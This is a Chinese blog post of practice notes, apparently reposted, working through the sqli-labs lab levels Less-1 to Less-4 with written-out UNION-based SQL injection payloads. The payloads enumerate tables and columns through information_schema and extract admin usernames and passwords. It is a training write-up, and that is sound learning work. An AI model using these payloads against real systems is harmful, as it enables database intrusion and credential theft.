标签:name union 笔记 admin sqliab --+ schema select 刷题
Less-1
- 测试是字符型还是数字型
-
判断所在字段数
-
查看显示值
可以看出显示2,3位置。因此我们选择2的位置进行联合注入
-
查看表名
- 我们要对admin,users等字符敏感
-
查看admin表中的字段名
-
显示内容
获得flag:helloword
-
less-1的代码
Less-2
-
判断字符型注入还是数字型注入
通过匹配单引号我们可以看出我们所写的单引号并没有被匹配因此我们可以看出这是一个数字注入
-
判断所在表的字段数
-1+order+by+4
-
查看显示位置
-1+union+select+1,2,3
-
查看表名
-1+union+select+1,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),3--+
-
查看admin表名的字段
-1+union+select+1,(select+group_concat(column_name)+from+information_schema.columns+where+table_name='admin'),3--+
-
查看内容
-1+union+select+1,(select+concat(username,0x5c,password)+from+admin+limit+0,1),3--+
-
代码查看
Less-3
-
查看
-1'
由错误回显可以看出该类型为字符型注入,且需要闭合引号
-1')--+
发现构造成功 -
判断字段数
-1')+order+by+4--+
-
查看显示位置
-1')+union+select+1,2,3--+
-
查看表名
-1')+union+select+1,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),3--+
-
查看字段
-1')+union+select+1,(select+group_concat(column_name)+from+information_schema.columns+where+table_name='admin'),3--+
-
查看内容
-
代码审计
Less-4
-
构造
-1'
无反应
-1"
发现我们需要闭合双引号和括号
-1") order by 100--+
发现构造成功
-
判断该表的字段数
-1")order+by+4--+
-
判断显示位置
-1")union+select+1,2,3--+
-
查询表名
-1")union+select+1,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),3--+
-
查看admin表中的字段名
-1")union+select+1,(select+group_concat(column_name)+from+information_schema.columns+where+table_name='admin'),3--+
-
获取admin表中内容
-1")union+select+1,(select+concat(username,0x5c,password)+from+admin),3--+
-
代码审计
标签:name,union,笔记,admin,sqliab,--+,schema,select,刷题 来源: https://www.cnblogs.com/nsqaq/p/15061245.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。